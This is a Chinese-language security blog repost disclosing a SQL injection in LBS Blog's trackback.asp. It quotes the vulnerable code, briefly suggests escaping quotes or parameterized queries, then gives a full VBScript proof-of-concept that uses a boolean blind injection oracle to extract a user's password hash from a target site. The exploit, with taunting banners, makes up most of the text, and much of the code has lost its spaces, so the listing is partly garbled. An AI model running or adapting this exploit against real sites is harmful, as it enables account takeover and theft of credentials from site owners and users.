鬼仔注:最近剑心貌似在读 LBS 的代码,已经挖出几个了,但好像还不足以刺激 SiC 发新版。这个洞的补丁看原文(原文链接此处缺失)。来源:Loveshell —— source/src_trackback.asp 中的注入
functiontrackbackSave(){
vartbEntry={"log_id":input["id"], "url":input["url"], "title":input["title"], "excerpt":input["excerpt"], "blog":input["blog_name"] }
//Thesefunctioncallslookreallyhorrible tbEntry.log_id=func.checkInt(tbEntry.log_id); tbEntry.url=func.trim(func.wordFilter(func.checkURL(tbEntry.url))); tbEntry.title=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.title)))); tbEntry.excerpt=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.excerpt)))); tbEntry.blog=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.blog))));
if(tbEntry.title=="")tbEntry.title=tbEntry.url;
//BetterLeavetheerrormessagesbelowinEnglish if(!tbEntry.log_id) trackbackResponse(1,"InvalidArticleID"); if(tbEntry.url=="") trackbackResponse(1,"SourceURLisBlank"); if(tbEntry.url==false||tbEntry.title==false||tbEntry.excerpt==false||tbEntry.blog==false) trackbackResponse(1,"Contentcontainsblockedwords");
vartmpA=connBlog.query("selectCount(log_ID)asiFROMblog_Articlewherelog_locked=falseANDlog_mode<4ANDlog_ID="+tbEntry.log_id); if(tmpA[0]["i"]==0)trackbackResponse(1,"Articledoesnotexistorislocked"); tmpA=connBlog.query("selectCount(tb_ID)asiFROMblog_Trackbackwheretb_Title='"+tbEntry.title+"'ANDtb_Excerpt='"+tbEntry.excerpt+"'"); if(tmpA[0]["i"]>0)trackbackResponse(1,"Trackbackisalreadysaved");
//Saving trackback   ← 注意:到这一行为止,tbEntry.title 和 tbEntry.excerpt 已经被原样拼进了上面那条 Count(tb_ID) 查询,而整个过程中没有任何一步对单引号做过转义,也没有使用参数化查询。修补思路:在拼接进 SQL 之前至少把 ' 替换成 ''(例如 replace(/'/g,"''")),更好的做法是改用带参数的查询。
tbEntry.log_id=func.checkInt(tbEntry.log_id); tbEntry.url=func.trim(func.wordFilter(func.checkURL(tbEntry.url))); tbEntry.title=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.title)))); tbEntry.excerpt=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.excerpt)))); tbEntry.blog=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.blog)))); log_id 被 checkInt 强制成了整数,但是 url、title、excerpt、blog 呢?它们只经过了 wordFilter(屏蔽词)、trim(去首尾空白)和 trimHTML/trimUBB(去掉 HTML/UBB 标记),这些都是内容过滤,不会去掉或转义单引号,对 SQL 注入没有任何防护作用。而这些字段全部来自
var tbEntry={"log_id":input["id"], "url":input["url"], "title":input["title"], "excerpt":input["excerpt"], "blog":input["blog_name"] } 也就是直接来自 input 的用户输入哈~~~~,很明显的一个注入嘛!
因为注入点位于一条 Count(tb_ID) 查询的 WHERE 子句里,而且前面还有 tb_Title='…' AND 这个条件,所以要用 or 把原有条件短路掉;这是一个字符型(单引号闭合)的注入,payload 末尾还要补上 and '1'='1 把引号配平。
这样可以看到效果
判断标志也很明显:注入的条件为真时 Count(tb_ID) > 0,页面返回 "Trackback is already saved";为假时没有这条信息。这就是一个布尔型盲注,可以据此逐字符猜解数据。
那么好了,exploit 也应该出来了(下面的 VBScript 就是利用上述真/假回显,逐位猜解 blog_user 表中 user_password 的 PoC):
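'============================================================================
' LBS Blog trackback.asp blind SQL injection PoC (historical).
'
' Usage, from a command prompt:
'   cscript.exe lbsblog.vbs <blog path of the target site> <user id to crack>
' e.g.
'   cscript.exe lbsblog.vbs www.xxxx.com/bbs/boke.asp admin
' by loveshell
'
' NOTE(review): Sub main interpolates the second argument unquoted into
' "where user_id=<value>", so it has to be the numeric user_id (as in the
' ShowUsage example), not a login name like "admin".
'
' The script POSTs crafted trackbacks to <target>/trackback.asp and uses the
' "Trackback is already saved" response as a true/false oracle to recover
' user_password one hex digit at a time (see Sub main).
'============================================================================
On Error Resume Next         ' every COM/HTTP error below is silently ignored

Dim oArgs                    ' command-line arguments
Dim olbsXML                  ' Microsoft.XMLHTTP object used to open the target URL
Dim TargetURL                ' target URL
Dim userid                   ' blog user id whose password hash is extracted
Dim TempStr                  ' hex digits of the password hash recovered so far
Dim CharHex                  ' the 16 hex digit characters, as an array

Set oArgs = WScript.arguments
If oArgs.count <> 2 Then Call ShowUsage()

Set olbsXML = createObject("Microsoft.XMLHTTP")

' Complete the target URL: add the scheme and a trailing slash if they are
' missing, then point it at trackback.asp.
TargetURL = oArgs(0)
If LCase(Left(TargetURL, 7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL, 1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL = TargetURL & "trackback.asp"

userid = oArgs(1)
TempStr = ""
CharHex = Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f", ",")

WScript.echo "LBSBlogAllversionExploit[新的注射漏洞]" & vbcrlf
WScript.echo "By剑心" & vbcrlf
WScript.echo "http://www.loveshell.net/~_~我真的够无聊的......" & vbcrlf & vbcrlf
WScript.echo "+Fuckthesitenow" & vbcrlf

' main reads the user from the script-level variable userid and ignores its
' second parameter; the original passed an undeclared BlogName here.
Call main(TargetURL, userid)

' Release the XMLHTTP object. The original released a never-assigned
' oBokeXML and left olbsXML alive.
Set olbsXML = Nothing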
'----------------------------------------------sub-------------------------------------------------------
'============================================
' Name:    main
' Purpose: main routine -- recovers the target user's password hash from
'          blog_user by boolean-based blind SQL injection through the
'          trackback "excerpt" field.
'
' Parameters:
'   TargetURL - full URL of trackback.asp (built by the caller)
'   BlogName  - unused; the user to attack is read from the script-level
'               variable userid instead
'
' Oracle: the injected condition is true when the response contains the
' duplicate-trackback message (presumably "Trackback is already saved" with
' spaces in the real page; this listing appears to have lost its whitespace).
' Each position costs up to 16 POSTs. The outer loop runs to 40 although the
' header comment describes an MD5 hash (32 hex digits), so positions past the
' hash length can never match and just waste 16 requests each.
' NOTE(review): once a position matches no digit, TempStr is not extended and
' every later position compares a longer prefix against a shorter guess, so
' nothing further can match -- the loop keeps running anyway. With
' On Error Resume Next in effect, HTTP failures are silently ignored too.
' userid is interpolated unquoted into "where user_id=", so it must be the
' numeric user_id.
'============================================
Sub main(TargetURL, BlogName)
    Dim MainOffset, SubOffset, TempLen, OpenURL, GetPage
    ' MainOffset = length of the hash prefix being tested (1..40);
    ' SubOffset  = index into CharHex of the candidate hex digit.
    For MainOffset = 1 To 40
        For SubOffset = 0 To 15
            TempLen = 0                  ' assigned but never read
            postdata = ""                ' not Dim'd; only works because Option Explicit is off
            ' Payload appended to the excerpt parameter: the leading quote
            ' closes the string in "... AND tb_Excerpt='<excerpt>'", the
            ' subselect compares the first MainOffset characters of
            ' user_password with the digits found so far plus the candidate
            ' digit, and the trailing and '1'='1 re-balances the quotes.
            postdata = "'or(selectleft(user_password," & MainOffset & ")fromblog_userwhereuser_id=" & userid & ")='" & TempStr & CharHex(SubOffset) & "'and'1'='1"
            OpenURL = TargetURL
            olbsXML.open "Post", OpenURL, False, "", ""
            olbsXML.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
            ' The fixed fields only have to pass the server-side checks;
            ' id=1 assumes article 1 exists and accepts trackbacks.
            olbsXML.send "url=http://www.loveshell.net/blog/&id=1&blog_name=loveshell_is_my_hero&excerpt=fuck" & escape(postdata)
            GetPage = BytesToBstr(olbsXML.ResponseBody)
            ' check whether the page we hit exists
            'WScript.echo GetPage
            If InStr(GetPage, "Trackbackisalreadysaved") <> 0 Then
                ' condition was true: this digit is correct, move to the next position
                TempStr = TempStr & CharHex(SubOffset)
                WScript.Echo "+Cracknow:" & TempStr & String(40 - MainOffset, "?")
                Exit For
            ElseIf InStr(GetPage, "TrackbackDisabled") <> 0 Then
                ' trackbacks are switched off on the target: the oracle is unavailable
                WScript.echo vbcrlf & "Somethingerror,Notvul" & vbcrlf
                WScript.Quit
            End If
        next
    Next
    WScript.Echo vbcrlf & "+WeGotIt:" & TempStr & vbcrlf & vbcrlf & ":PDon'tBeevil"
End sub
'============================================
' Name:    BytesToBstr
' Purpose: convert the raw bytes held by the XMLHTTP object into a
'          VBScript string, decoding them as GB2312.
' Parameter: body - byte array, e.g. olbsXML.ResponseBody
' Returns:   the decoded text
'============================================
Function BytesToBstr(body)
    Dim stm
    Set stm = createObject("ADODB.Stream")
    With stm
        .Type = 1              ' adTypeBinary: take the raw bytes
        .Mode = 3              ' adModeReadWrite
        .Open
        .Write body
        .Position = 0          ' rewind before switching to text mode
        .Type = 2              ' adTypeText
        .Charset = "GB2312"
        BytesToBstr = .ReadText
        .Close
    End With
    Set stm = Nothing
End Function
'============================
' Name:    ShowUsage
' Purpose: print the command-line usage and terminate the script.
'============================
Sub ShowUsage()
    Dim scriptPath
    scriptPath = WScript.ScriptFullName
    WScript.echo "LBSblogExploit" & vbcrlf & "ByLoveshell/剑心"
    WScript.echo "Usage:" & vbcrlf & "CScript" & scriptPath & "TargetURLuserid"
    WScript.echo "Example:" & vbcrlf & "CScript" & scriptPath & "http://www.loveshell.net/1"
    WScript.echo ""
    WScript.Quit
End Sub
|